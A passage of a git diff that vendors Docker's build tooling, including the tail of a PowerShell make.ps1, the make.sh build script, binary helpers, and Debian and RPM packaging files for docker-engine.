$upstreamCommit...$headCommit --diff-filter=ACMR --name-only -- `'*.go`'" + $files = $files | Select-String -NotMatch "^vendor/" | Select-String -NotMatch "^cli/compose/schema/bindata.go" + $badFiles=@(); $files | %{ + # Deliberately ignore error on next line - treat as failed + $content=Invoke-Expression "git show $headCommit`:$_" + + # Next set of hoops are to ensure we have LF not CRLF semantics as otherwise gofmt on Windows will not succeed. + # Also note that gofmt on Windows does not appear to support stdin piping correctly. Hence go through a temporary file. + $content=$content -join "`n" + $content+="`n" + $outputFile=[System.IO.Path]::GetTempFileName() + if (Test-Path $outputFile) { Remove-Item $outputFile } + [System.IO.File]::WriteAllText($outputFile, $content, (New-Object System.Text.UTF8Encoding($False))) + $valid=Invoke-Expression "gofmt -s -l $outputFile" + Write-Host "Checking $outputFile" + if ($valid.Length -ne 0) { $badFiles+=$_ } + if (Test-Path $outputFile) { Remove-Item $outputFile } + } + if ($badFiles.Length -eq 0) { + Write-Host 'Congratulations! All Go source files are properly formatted.' + } else { + $e = "`nThese files are not properly gofmt`'d:`n" + $badFiles | %{ $e+=" - $_`n"} + $e+= "`nPlease reformat the above files using `"gofmt -s -w`" and commit the result." + Throw $e + } +} + +# Run the unit tests +Function Run-UnitTests() { + Write-Host "INFO: Running unit tests..." + $testPath="./..." + $goListCommand = "go list -e -f '{{if ne .Name """ + '\"github.com/docker/docker\"' + """}}{{.ImportPath}}{{end}}' $testPath" + $pkgList = $(Invoke-Expression $goListCommand) + if ($LASTEXITCODE -ne 0) { Throw "go list for unit tests failed" } + $pkgList = $pkgList | Select-String -Pattern "github.com/docker/docker" + $pkgList = $pkgList | Select-String -NotMatch "github.com/docker/docker/vendor" + $pkgList = $pkgList | Select-String -NotMatch "github.com/docker/docker/man" + $pkgList = $pkgList | Select-String -NotMatch "github.com/docker/docker/integration-cli" + $pkgList = $pkgList -replace "`r`n", " " + $goTestCommand = "go test" + $raceParm + " -cover -ldflags -w -tags """ + "autogen daemon" + """ -a """ + "-test.timeout=10m" + """ $pkgList" + Invoke-Expression $goTestCommand + if ($LASTEXITCODE -ne 0) { Throw "Unit tests failed" } +} + +# Start of main code. +Try { + Write-Host -ForegroundColor Cyan "INFO: make.ps1 starting at $(Get-Date)" + $root=$(pwd) + + # Handle the "-All" shortcut to turn on all things we can handle. + if ($All) { $Client=$True; $Daemon=$True; $DCO=$True; $PkgImports=$True; $GoFormat=$True; $TestUnit=$True } + + # Handle the "-Binary" shortcut to build both client and daemon. + if ($Binary) { $Client = $True; $Daemon = $True } + + # Make sure we have something to do + if (-not($Client) -and -not($Daemon) -and -not($DCO) -and -not($PkgImports) -and -not($GoFormat) -and -not($TestUnit)) { Throw 'Nothing to do. Try adding "-All" for everything I can do' } + + # Verify git is installed + if ($(Get-Command git -ErrorAction SilentlyContinue) -eq $nil) { Throw "Git does not appear to be installed" } + + # Verify go is installed + if ($(Get-Command go -ErrorAction SilentlyContinue) -eq $nil) { Throw "GoLang does not appear to be installed" } + + # Get the git commit. This will also verify if we are in a repo or not. Then add a custom string if supplied. + $gitCommit=Get-GitCommit + if ($CommitSuffix -ne "") { $gitCommit += "-"+$CommitSuffix -Replace ' ', '' } + + # Get the version of docker (eg 1.14.0-dev) + $dockerVersion=Get-DockerVersion + + # Give a warning if we are not running in a container and are building binaries or running unit tests. + # Not relevant for validation tests as these are fine to run outside of a container. + if ($Client -or $Daemon -or $TestUnit) { Check-InContainer } + + # Verify GOPATH is set + if ($env:GOPATH.Length -eq 0) { Throw "Missing GOPATH environment variable. See https://golang.org/doc/code.html#GOPATH" } + + # Run autogen if building binaries or running unit tests. + if ($Client -or $Daemon -or $TestUnit) { + Write-Host "INFO: Invoking autogen..." + Try { .\hack\make\.go-autogen.ps1 -CommitString $gitCommit -DockerVersion $dockerVersion } + Catch [Exception] { Throw $_ } + } + + # DCO, Package import and Go formatting tests. + if ($DCO -or $PkgImports -or $GoFormat) { + # We need the head and upstream commits for these + $headCommit=Get-HeadCommit + $upstreamCommit=Get-UpstreamCommit + + # Run DCO validation + if ($DCO) { Validate-DCO $headCommit $upstreamCommit } + + # Run `gofmt` validation + if ($GoFormat) { Validate-GoFormat $headCommit $upstreamCommit } + + # Run pkg isolation validation + if ($PkgImports) { Validate-PkgImports $headCommit $upstreamCommit } + } + + # Build the binaries + if ($Client -or $Daemon) { + # Create the bundles directory if it doesn't exist + if (-not (Test-Path ".\bundles")) { New-Item ".\bundles" -ItemType Directory | Out-Null } + + # Perform the actual build + if ($Daemon) { Execute-Build "daemon" "daemon" "dockerd" } + if ($Client) { Execute-Build "client" "" "docker" } + } + + # Run unit tests + if ($TestUnit) { Run-UnitTests } + + # Gratuitous ASCII art. + if ($Daemon -or $Client) { + Write-Host + Write-Host -ForegroundColor Green " ________ ____ __." + Write-Host -ForegroundColor Green " \_____ \ `| `|/ _`|" + Write-Host -ForegroundColor Green " / `| \`| `<" + Write-Host -ForegroundColor Green " / `| \ `| \" + Write-Host -ForegroundColor Green " \_______ /____`|__ \" + Write-Host -ForegroundColor Green " \/ \/" + Write-Host + } +} +Catch [Exception] { + Write-Host -ForegroundColor Red ("`nERROR: make.ps1 failed:`n$_") + + # More gratuitous ASCII art. + Write-Host + Write-Host -ForegroundColor Red "___________ .__.__ .___" + Write-Host -ForegroundColor Red "\_ _____/____ `|__`| `| ____ __`| _/" + Write-Host -ForegroundColor Red " `| __) \__ \ `| `| `| _/ __ \ / __ `| " + Write-Host -ForegroundColor Red " `| \ / __ \`| `| `|_\ ___// /_/ `| " + Write-Host -ForegroundColor Red " \___ / (____ /__`|____/\___ `>____ `| " + Write-Host -ForegroundColor Red " \/ \/ \/ \/ " + Write-Host + + Throw $_ +} +Finally { + if ($global:pushed) { Pop-Location } + Write-Host -ForegroundColor Cyan "INFO: make.ps1 ended at $(Get-Date)" +} diff --git a/vendor/github.com/docker/docker/hack/make.sh b/vendor/github.com/docker/docker/hack/make.sh new file mode 100755 index 0000000000..f0e482feda --- /dev/null +++ b/vendor/github.com/docker/docker/hack/make.sh @@ -0,0 +1,304 @@ +#!/usr/bin/env bash +set -e + +# This script builds various binary artifacts from a checkout of the docker +# source code. +# +# Requirements: +# - The current directory should be a checkout of the docker source code +# (https://github.com/docker/docker). Whatever version is checked out +# will be built. +# - The VERSION file, at the root of the repository, should exist, and +# will be used as Docker binary version and package version. +# - The hash of the git commit will also be included in the Docker binary, +# with the suffix -unsupported if the repository isn't clean. +# - The script is intended to be run inside the docker container specified +# in the Dockerfile at the root of the source. In other words: +# DO NOT CALL THIS SCRIPT DIRECTLY. +# - The right way to call this script is to invoke "make" from +# your checkout of the Docker repository. +# the Makefile will do a "docker build -t docker ." and then +# "docker run hack/make.sh" in the resulting image. +# + +set -o pipefail + +export DOCKER_PKG='github.com/docker/docker' +export SCRIPTDIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )" +export MAKEDIR="$SCRIPTDIR/make" +export PKG_CONFIG=${PKG_CONFIG:-pkg-config} + +# We're a nice, sexy, little shell script, and people might try to run us; +# but really, they shouldn't. We want to be in a container! +inContainer="AssumeSoInitially" +if [ "$(go env GOHOSTOS)" = 'windows' ]; then + if [ -z "$FROM_DOCKERFILE" ]; then + unset inContainer + fi +else + if [ "$PWD" != "/go/src/$DOCKER_PKG" ] || [ -z "$DOCKER_CROSSPLATFORMS" ]; then + unset inContainer + fi +fi + +if [ -z "$inContainer" ]; then + { + echo "# WARNING! I don't seem to be running in a Docker container." + echo "# The result of this command might be an incorrect build, and will not be" + echo "# officially supported." + echo "#" + echo "# Try this instead: make all" + echo "#" + } >&2 +fi + +echo + +# List of bundles to create when no argument is passed +DEFAULT_BUNDLES=( + binary-client + binary-daemon + dynbinary + + test-unit + test-integration-cli + test-docker-py + + cross + tgz +) + +VERSION=$(< ./VERSION) +! BUILDTIME=$(date --rfc-3339 ns 2> /dev/null | sed -e 's/ /T/') +if command -v git &> /dev/null && [ -d .git ] && git rev-parse &> /dev/null; then + GITCOMMIT=$(git rev-parse --short HEAD) + if [ -n "$(git status --porcelain --untracked-files=no)" ]; then + GITCOMMIT="$GITCOMMIT-unsupported" + echo "#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~" + echo "# GITCOMMIT = $GITCOMMIT" + echo "# The version you are building is listed as unsupported because" + echo "# there are some files in the git repository that are in an uncommitted state." + echo "# Commit these changes, or add to .gitignore to remove the -unsupported from the version." + echo "# Here is the current list:" + git status --porcelain --untracked-files=no + echo "#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~" + fi +elif [ "$DOCKER_GITCOMMIT" ]; then + GITCOMMIT="$DOCKER_GITCOMMIT" +else + echo >&2 'error: .git directory missing and DOCKER_GITCOMMIT not specified' + echo >&2 ' Please either build with the .git directory accessible, or specify the' + echo >&2 ' exact (--short) commit hash you are building using DOCKER_GITCOMMIT for' + echo >&2 ' future accountability in diagnosing build issues. Thanks!' + exit 1 +fi + +if [ "$AUTO_GOPATH" ]; then + rm -rf .gopath + mkdir -p .gopath/src/"$(dirname "${DOCKER_PKG}")" + ln -sf ../../../.. .gopath/src/"${DOCKER_PKG}" + export GOPATH="${PWD}/.gopath" + + if [ "$(go env GOOS)" = 'solaris' ]; then + # sys/unix is installed outside the standard library on solaris + # TODO need to allow for version change, need to get version from go + export GO_VERSION=${GO_VERSION:-"1.7.1"} + export GOPATH="${GOPATH}:/usr/lib/gocode/${GO_VERSION}" + fi +fi + +if [ ! "$GOPATH" ]; then + echo >&2 'error: missing GOPATH; please see https://golang.org/doc/code.html#GOPATH' + echo >&2 ' alternatively, set AUTO_GOPATH=1' + exit 1 +fi + +DOCKER_BUILDTAGS+=" daemon" +if ${PKG_CONFIG} 'libsystemd >= 209' 2> /dev/null ; then + DOCKER_BUILDTAGS+=" journald" +elif ${PKG_CONFIG} 'libsystemd-journal' 2> /dev/null ; then + DOCKER_BUILDTAGS+=" journald journald_compat" +fi + +# test whether "btrfs/version.h" exists and apply btrfs_noversion appropriately +if \ + command -v gcc &> /dev/null \ + && ! gcc -E - -o /dev/null &> /dev/null <<<'#include ' \ +; then + DOCKER_BUILDTAGS+=' btrfs_noversion' +fi + +# test whether "libdevmapper.h" is new enough to support deferred remove +# functionality. +if \ + command -v gcc &> /dev/null \ + && ! ( echo -e '#include \nint main() { dm_task_deferred_remove(NULL); }'| gcc -xc - -o /dev/null -ldevmapper &> /dev/null ) \ +; then + DOCKER_BUILDTAGS+=' libdm_no_deferred_remove' +fi + +# Use these flags when compiling the tests and final binary + +IAMSTATIC='true' +source "$SCRIPTDIR/make/.go-autogen" +if [ -z "$DOCKER_DEBUG" ]; then + LDFLAGS='-w' +fi + +LDFLAGS_STATIC='' +EXTLDFLAGS_STATIC='-static' +# ORIG_BUILDFLAGS is necessary for the cross target which cannot always build +# with options like -race. +ORIG_BUILDFLAGS=( -tags "autogen netgo static_build sqlite_omit_load_extension $DOCKER_BUILDTAGS" -installsuffix netgo ) +# see https://github.com/golang/go/issues/9369#issuecomment-69864440 for why -installsuffix is necessary here + +# When $DOCKER_INCREMENTAL_BINARY is set in the environment, enable incremental +# builds by installing dependent packages to the GOPATH. +REBUILD_FLAG="-a" +if [ "$DOCKER_INCREMENTAL_BINARY" ]; then + REBUILD_FLAG="-i" +fi +ORIG_BUILDFLAGS+=( $REBUILD_FLAG ) + +BUILDFLAGS=( $BUILDFLAGS "${ORIG_BUILDFLAGS[@]}" ) +# Test timeout. + +if [ "${DOCKER_ENGINE_GOARCH}" == "arm" ]; then + : ${TIMEOUT:=10m} +elif [ "${DOCKER_ENGINE_GOARCH}" == "windows" ]; then + : ${TIMEOUT:=8m} +else + : ${TIMEOUT:=5m} +fi + +LDFLAGS_STATIC_DOCKER=" + $LDFLAGS_STATIC + -extldflags \"$EXTLDFLAGS_STATIC\" +" + +if [ "$(uname -s)" = 'FreeBSD' ]; then + # Tell cgo the compiler is Clang, not GCC + # https://code.google.com/p/go/source/browse/src/cmd/cgo/gcc.go?spec=svne77e74371f2340ee08622ce602e9f7b15f29d8d3&r=e6794866ebeba2bf8818b9261b54e2eef1c9e588#752 + export CC=clang + + # "-extld clang" is a workaround for + # https://code.google.com/p/go/issues/detail?id=6845 + LDFLAGS="$LDFLAGS -extld clang" +fi + +# If sqlite3.h doesn't exist under /usr/include, +# check /usr/local/include also just in case +# (e.g. FreeBSD Ports installs it under the directory) +if [ ! -e /usr/include/sqlite3.h ] && [ -e /usr/local/include/sqlite3.h ]; then + export CGO_CFLAGS='-I/usr/local/include' + export CGO_LDFLAGS='-L/usr/local/lib' +fi + +HAVE_GO_TEST_COVER= +if \ + go help testflag | grep -- -cover > /dev/null \ + && go tool -n cover > /dev/null 2>&1 \ +; then + HAVE_GO_TEST_COVER=1 +fi + +# a helper to provide ".exe" when it's appropriate +binary_extension() { + if [ "$(go env GOOS)" = 'windows' ]; then + echo -n '.exe' + fi +} + +hash_files() { + while [ $# -gt 0 ]; do + f="$1" + shift + dir="$(dirname "$f")" + base="$(basename "$f")" + for hashAlgo in md5 sha256; do + if command -v "${hashAlgo}sum" &> /dev/null; then + ( + # subshell and cd so that we get output files like: + # $HASH docker-$VERSION + # instead of: + # $HASH /go/src/github.com/.../$VERSION/binary/docker-$VERSION + cd "$dir" + "${hashAlgo}sum" "$base" > "$base.$hashAlgo" + ) + fi + done + done +} + +bundle() { + local bundle="$1"; shift + echo "---> Making bundle: $(basename "$bundle") (in $DEST)" + source "$SCRIPTDIR/make/$bundle" "$@" +} + +copy_binaries() { + dir="$1" + # Add nested executables to bundle dir so we have complete set of + # them available, but only if the native OS/ARCH is the same as the + # OS/ARCH of the build target + if [ "$(go env GOOS)/$(go env GOARCH)" == "$(go env GOHOSTOS)/$(go env GOHOSTARCH)" ]; then + if [ -x /usr/local/bin/docker-runc ]; then + echo "Copying nested executables into $dir" + for file in containerd containerd-shim containerd-ctr runc init proxy; do + cp `which "docker-$file"` "$dir/" + if [ "$2" == "hash" ]; then + hash_files "$dir/docker-$file" + fi + done + fi + fi +} + +install_binary() { + file="$1" + target="${DOCKER_MAKE_INSTALL_PREFIX:=/usr/local}/bin/" + if [ "$(go env GOOS)" == "linux" ]; then + echo "Installing $(basename $file) to ${target}" + cp -L "$file" "$target" + else + echo "Install is only supported on linux" + return 1 + fi +} + +main() { + # We want this to fail if the bundles already exist and cannot be removed. + # This is to avoid mixing bundles from different versions of the code. + mkdir -p bundles + if [ -e "bundles/$VERSION" ] && [ -z "$KEEPBUNDLE" ]; then + echo "bundles/$VERSION already exists. Removing." + rm -fr "bundles/$VERSION" && mkdir "bundles/$VERSION" || exit 1 + echo + fi + + if [ "$(go env GOHOSTOS)" != 'windows' ]; then + # Windows and symlinks don't get along well + + rm -f bundles/latest + ln -s "$VERSION" bundles/latest + fi + + if [ $# -lt 1 ]; then + bundles=(${DEFAULT_BUNDLES[@]}) + else + bundles=($@) + fi + for bundle in ${bundles[@]}; do + export DEST="bundles/$VERSION/$(basename "$bundle")" + # Cygdrive paths don't play well with go build -o. + if [[ "$(uname -s)" == CYGWIN* ]]; then + export DEST="$(cygpath -mw "$DEST")" + fi + mkdir -p "$DEST" + ABS_DEST="$(cd "$DEST" && pwd -P)" + bundle "$bundle" + echo + done +} + +main "$@" diff --git a/vendor/github.com/docker/docker/hack/make/.binary b/vendor/github.com/docker/docker/hack/make/.binary new file mode 100644 index 0000000000..f5c35c3b7e --- /dev/null +++ b/vendor/github.com/docker/docker/hack/make/.binary @@ -0,0 +1,48 @@ +#!/bin/bash +set -e + +BINARY_NAME="$BINARY_SHORT_NAME-$VERSION" +BINARY_EXTENSION="$(binary_extension)" +BINARY_FULLNAME="$BINARY_NAME$BINARY_EXTENSION" + +source "${MAKEDIR}/.go-autogen" + +( +export GOGC=${DOCKER_BUILD_GOGC:-1000} + +if [ "$(go env GOOS)/$(go env GOARCH)" != "$(go env GOHOSTOS)/$(go env GOHOSTARCH)" ]; then + # must be cross-compiling! + case "$(go env GOOS)/$(go env GOARCH)" in + windows/amd64) + export CC=x86_64-w64-mingw32-gcc + export CGO_ENABLED=1 + ;; + esac +fi + +if [ "$IAMSTATIC" == "true" ] && [ "$(go env GOHOSTOS)" == "linux" ]; then + if [ "${GOOS}/${GOARCH}" == "darwin/amd64" ]; then + export CGO_ENABLED=1 + export CC=o64-clang + export LDFLAGS='-linkmode external -s' + export LDFLAGS_STATIC_DOCKER='-extld='${CC} + else + export BUILDFLAGS=( "${BUILDFLAGS[@]/pkcs11 /}" ) # we cannot dlopen in pkcs11 in a static binary + fi +fi + +echo "Building: $DEST/$BINARY_FULLNAME" +go build \ + -o "$DEST/$BINARY_FULLNAME" \ + "${BUILDFLAGS[@]}" \ + -ldflags " + $LDFLAGS + $LDFLAGS_STATIC_DOCKER + " \ + $GO_PACKAGE +) + +echo "Created binary: $DEST/$BINARY_FULLNAME" +ln -sf "$BINARY_FULLNAME" "$DEST/$BINARY_SHORT_NAME$BINARY_EXTENSION" + +hash_files "$DEST/$BINARY_FULLNAME" diff --git a/vendor/github.com/docker/docker/hack/make/.binary-setup b/vendor/github.com/docker/docker/hack/make/.binary-setup new file mode 100644 index 0000000000..b9f8ce2517 --- /dev/null +++ b/vendor/github.com/docker/docker/hack/make/.binary-setup @@ -0,0 +1,10 @@ +#!/bin/bash + +DOCKER_CLIENT_BINARY_NAME='docker' +DOCKER_DAEMON_BINARY_NAME='dockerd' +DOCKER_RUNC_BINARY_NAME='docker-runc' +DOCKER_CONTAINERD_BINARY_NAME='docker-containerd' +DOCKER_CONTAINERD_CTR_BINARY_NAME='docker-containerd-ctr' +DOCKER_CONTAINERD_SHIM_BINARY_NAME='docker-containerd-shim' +DOCKER_PROXY_BINARY_NAME='docker-proxy' +DOCKER_INIT_BINARY_NAME='docker-init' diff --git a/vendor/github.com/docker/docker/hack/make/.build-deb/compat b/vendor/github.com/docker/docker/hack/make/.build-deb/compat new file mode 100644 index 0000000000..ec635144f6 --- /dev/null +++ b/vendor/github.com/docker/docker/hack/make/.build-deb/compat @@ -0,0 +1 @@ +9 diff --git a/vendor/github.com/docker/docker/hack/make/.build-deb/control b/vendor/github.com/docker/docker/hack/make/.build-deb/control new file mode 100644 index 0000000000..0f5439947c --- /dev/null +++ b/vendor/github.com/docker/docker/hack/make/.build-deb/control @@ -0,0 +1,29 @@ +Source: docker-engine +Section: admin +Priority: optional +Maintainer: Docker +Standards-Version: 3.9.6 +Homepage: https://dockerproject.org +Vcs-Browser: https://github.com/docker/docker +Vcs-Git: git://github.com/docker/docker.git + +Package: docker-engine +Architecture: linux-any +Depends: iptables, ${misc:Depends}, ${perl:Depends}, ${shlibs:Depends} +Recommends: aufs-tools, + ca-certificates, + cgroupfs-mount | cgroup-lite, + git, + xz-utils, + ${apparmor:Recommends} +Conflicts: docker (<< 1.5~), docker.io, lxc-docker, lxc-docker-virtual-package, docker-engine-cs +Description: Docker: the open-source application container engine + Docker is an open source project to build, ship and run any application as a + lightweight container + . + Docker containers are both hardware-agnostic and platform-agnostic. This means + they can run anywhere, from your laptop to the largest EC2 compute instance and + everything in between - and they don't require you to use a particular + language, framework or packaging system. That makes them great building blocks + for deploying and scaling web apps, databases, and backend services without + depending on a particular stack or provider. diff --git a/vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.bash-completion b/vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.bash-completion new file mode 100644 index 0000000000..6ea1119308 --- /dev/null +++ b/vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.bash-completion @@ -0,0 +1 @@ +contrib/completion/bash/docker diff --git a/vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.docker.default b/vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.docker.default new file mode 120000 index 0000000000..4278533d65 --- /dev/null +++ b/vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.docker.default @@ -0,0 +1 @@ +../../../contrib/init/sysvinit-debian/docker.default \ No newline at end of file diff --git a/vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.docker.init b/vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.docker.init new file mode 120000 index 0000000000..8cb89d30dd --- /dev/null +++ b/vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.docker.init @@ -0,0 +1 @@ +../../../contrib/init/sysvinit-debian/docker \ No newline at end of file diff --git a/vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.docker.upstart b/vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.docker.upstart new file mode 120000 index 0000000000..7e1b64a3e6 --- /dev/null +++ b/vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.docker.upstart @@ -0,0 +1 @@ +../../../contrib/init/upstart/docker.conf \ No newline at end of file diff --git a/vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.install b/vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.install new file mode 100644 index 0000000000..dc6b25f04f --- /dev/null +++ b/vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.install @@ -0,0 +1,12 @@ +#contrib/syntax/vim/doc/* /usr/share/vim/vimfiles/doc/ +#contrib/syntax/vim/ftdetect/* /usr/share/vim/vimfiles/ftdetect/ +#contrib/syntax/vim/syntax/* /usr/share/vim/vimfiles/syntax/ +contrib/*-integration usr/share/docker-engine/contrib/ +contrib/check-config.sh usr/share/docker-engine/contrib/ +contrib/completion/fish/docker.fish usr/share/fish/vendor_completions.d/ +contrib/completion/zsh/_docker usr/share/zsh/vendor-completions/ +contrib/init/systemd/docker.service lib/systemd/system/ +contrib/init/systemd/docker.socket lib/systemd/system/ +contrib/mk* usr/share/docker-engine/contrib/ +contrib/nuke-graph-directory.sh usr/share/docker-engine/contrib/ +contrib/syntax/nano/Dockerfile.nanorc usr/share/nano/ diff --git a/vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.manpages b/vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.manpages new file mode 100644 index 0000000000..1aa62186a6 --- /dev/null +++ b/vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.manpages @@ -0,0 +1 @@ +man/man*/* diff --git a/vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.postinst b/vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.postinst new file mode 100644 index 0000000000..eeef6ca801 --- /dev/null +++ b/vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.postinst @@ -0,0 +1,20 @@ +#!/bin/sh +set -e + +case "$1" in + configure) + if [ -z "$2" ]; then + if ! getent group docker > /dev/null; then + groupadd --system docker + fi + fi + ;; + abort-*) + # How'd we get here?? + exit 1 + ;; + *) + ;; +esac + +#DEBHELPER# diff --git a/vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.udev b/vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.udev new file mode 120000 index 0000000000..914a361959 --- /dev/null +++ b/vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.udev @@ -0,0 +1 @@ +../../../contrib/udev/80-docker.rules \ No newline at end of file diff --git a/vendor/github.com/docker/docker/hack/make/.build-deb/docs b/vendor/github.com/docker/docker/hack/make/.build-deb/docs new file mode 100644 index 0000000000..b43bf86b50 --- /dev/null +++ b/vendor/github.com/docker/docker/hack/make/.build-deb/docs @@ -0,0 +1 @@ +README.md diff --git a/vendor/github.com/docker/docker/hack/make/.build-deb/rules b/vendor/github.com/docker/docker/hack/make/.build-deb/rules new file mode 100755 index 0000000000..6522103e5d --- /dev/null +++ b/vendor/github.com/docker/docker/hack/make/.build-deb/rules @@ -0,0 +1,55 @@ +#!/usr/bin/make -f + +VERSION = $(shell cat VERSION) +SYSTEMD_VERSION := $(shell dpkg-query -W -f='$${Version}\n' systemd | cut -d- -f1) +SYSTEMD_GT_227 := $(shell [ '$(SYSTEMD_VERSION)' ] && [ '$(SYSTEMD_VERSION)' -gt 227 ] && echo true ) + +override_dh_gencontrol: + # if we're on Ubuntu, we need to Recommends: apparmor + echo 'apparmor:Recommends=$(shell dpkg-vendor --is Ubuntu && echo apparmor)' >> debian/docker-engine.substvars + dh_gencontrol + +override_dh_auto_build: + ./hack/make.sh dynbinary + # ./man/md2man-all.sh runs outside the build container (if at all), since we don't have go-md2man here + +override_dh_auto_test: + ./bundles/$(VERSION)/dynbinary-daemon/dockerd -v + ./bundles/$(VERSION)/dynbinary-client/docker -v + +override_dh_strip: + # Go has lots of problems with stripping, so just don't + +override_dh_auto_install: + mkdir -p debian/docker-engine/usr/bin + cp -aT "$$(readlink -f bundles/$(VERSION)/dynbinary-client/docker)" debian/docker-engine/usr/bin/docker + cp -aT "$$(readlink -f bundles/$(VERSION)/dynbinary-daemon/dockerd)" debian/docker-engine/usr/bin/dockerd + cp -aT /usr/local/bin/docker-proxy debian/docker-engine/usr/bin/docker-proxy + cp -aT /usr/local/bin/docker-containerd debian/docker-engine/usr/bin/docker-containerd + cp -aT /usr/local/bin/docker-containerd-shim debian/docker-engine/usr/bin/docker-containerd-shim + cp -aT /usr/local/bin/docker-containerd-ctr debian/docker-engine/usr/bin/docker-containerd-ctr + cp -aT /usr/local/bin/docker-runc debian/docker-engine/usr/bin/docker-runc + cp -aT /usr/local/bin/docker-init debian/docker-engine/usr/bin/docker-init + mkdir -p debian/docker-engine/usr/lib/docker + +override_dh_installinit: + # use "docker" as our service name, not "docker-engine" + dh_installinit --name=docker +ifeq (true, $(SYSTEMD_GT_227)) + $(warning "Setting TasksMax=infinity") + sed -i -- 's/#TasksMax=infinity/TasksMax=infinity/' debian/docker-engine/lib/systemd/system/docker.service +endif + +override_dh_installudev: + # match our existing priority + dh_installudev --priority=z80 + +override_dh_install: + dh_install + dh_apparmor --profile-name=docker-engine -pdocker-engine + +override_dh_shlibdeps: + dh_shlibdeps --dpkg-shlibdeps-params=--ignore-missing-info + +%: + dh $@ --with=bash-completion $(shell command -v dh_systemd_enable > /dev/null 2>&1 && echo --with=systemd) diff --git a/vendor/github.com/docker/docker/hack/make/.build-rpm/docker-engine-selinux.spec b/vendor/github.com/docker/docker/hack/make/.build-rpm/docker-engine-selinux.spec new file mode 100644 index 0000000000..ae597bd774 --- /dev/null +++ b/vendor/github.com/docker/docker/hack/make/.build-rpm/docker-engine-selinux.spec @@ -0,0 +1,96 @@ +# Some bits borrowed from the openstack-selinux package +Name: docker-engine-selinux +Version: %{_version} +Release: %{_release}%{?dist} +Summary: SELinux Policies for the open-source application container engine +BuildArch: noarch +Group: Tools/Docker + +License: GPLv2 +Source: %{name}.tar.gz + +URL: https://dockerproject.org +Vendor: Docker +Packager: Docker + +%global selinux_policyver 3.13.1-102 +%global selinuxtype targeted +%global moduletype services +%global modulenames docker + +Requires(post): selinux-policy-base >= %{selinux_policyver}, selinux-policy-targeted >= %{selinux_policyver}, policycoreutils, policycoreutils-python libselinux-utils +BuildRequires: selinux-policy selinux-policy-devel + +# conflicting packages +Conflicts: docker-selinux + +# Usage: _format var format +# Expand 'modulenames' into various formats as needed +# Format must contain '$x' somewhere to do anything useful +%global _format() export %1=""; for x in %{modulenames}; do %1+=%2; %1+=" "; done; + +# Relabel files +%global relabel_files() \ + /sbin/restorecon -R %{_bindir}/docker %{_localstatedir}/run/docker.sock %{_localstatedir}/run/docker.pid %{_sysconfdir}/docker %{_localstatedir}/log/docker %{_localstatedir}/log/lxc %{_localstatedir}/lock/lxc %{_usr}/lib/systemd/system/docker.service /root/.docker &> /dev/null || : \ + +%description +SELinux policy modules for use with Docker + +%prep +%if 0%{?centos} <= 6 +%setup -n %{name} +%else +%autosetup -n %{name} +%endif + +%build +make SHARE="%{_datadir}" TARGETS="%{modulenames}" + +%install + +# Install SELinux interfaces +%_format INTERFACES $x.if +install -d %{buildroot}%{_datadir}/selinux/devel/include/%{moduletype} +install -p -m 644 $INTERFACES %{buildroot}%{_datadir}/selinux/devel/include/%{moduletype} + +# Install policy modules +%_format MODULES $x.pp.bz2 +install -d %{buildroot}%{_datadir}/selinux/packages +install -m 0644 $MODULES %{buildroot}%{_datadir}/selinux/packages + +%post +# +# Install all modules in a single transaction +# +if [ $1 -eq 1 ]; then + %{_sbindir}/setsebool -P -N virt_use_nfs=1 virt_sandbox_use_all_caps=1 +fi +%_format MODULES %{_datadir}/selinux/packages/$x.pp.bz2 +%{_sbindir}/semodule -n -s %{selinuxtype} -i $MODULES +if %{_sbindir}/selinuxenabled ; then + %{_sbindir}/load_policy + %relabel_files + if [ $1 -eq 1 ]; then + restorecon -R %{_sharedstatedir}/docker + fi +fi + +%postun +if [ $1 -eq 0 ]; then + %{_sbindir}/semodule -n -r %{modulenames} &> /dev/null || : + if %{_sbindir}/selinuxenabled ; then + %{_sbindir}/load_policy + %relabel_files + fi +fi + +%files +%doc LICENSE +%defattr(-,root,root,0755) +%attr(0644,root,root) %{_datadir}/selinux/packages/*.pp.bz2 +%attr(0644,root,root) %{_datadir}/selinux/devel/include/%{moduletype}/*.if + +%changelog +* Tue Dec 1 2015 Jessica Frazelle 1.9.1-1 +- add licence to rpm +- add selinux-policy and docker-engine-selinux rpm diff --git a/vendor/github.com/docker/docker/hack/make/.build-rpm/docker-engine.spec b/vendor/github.com/docker/docker/hack/make/.build-rpm/docker-engine.spec new file mode 100644 index 0000000000..d53e55b6c9 --- /dev/null +++ b/vendor/github.com/docker/docker/hack/make/.build-rpm/docker-engine.spec @@ -0,0 +1,254 @@ +Name: docker-engine +Version: %{_version} +Release: %{_release}%{?dist} +Summary: The open-source application container engine +Group: Tools/Docker + +License: ASL 2.0 +Source: %{name}.tar.gz + +URL: https://dockerproject.org +Vendor: Docker +Packager: Docker + +# is_systemd conditional +%if 0%{?fedora} >= 21 || 0%{?centos} >= 7 || 0%{?rhel} >= 7 || 0%{?suse_version} >= 1210 +%global is_systemd 1 +%endif + +# required packages for build +# 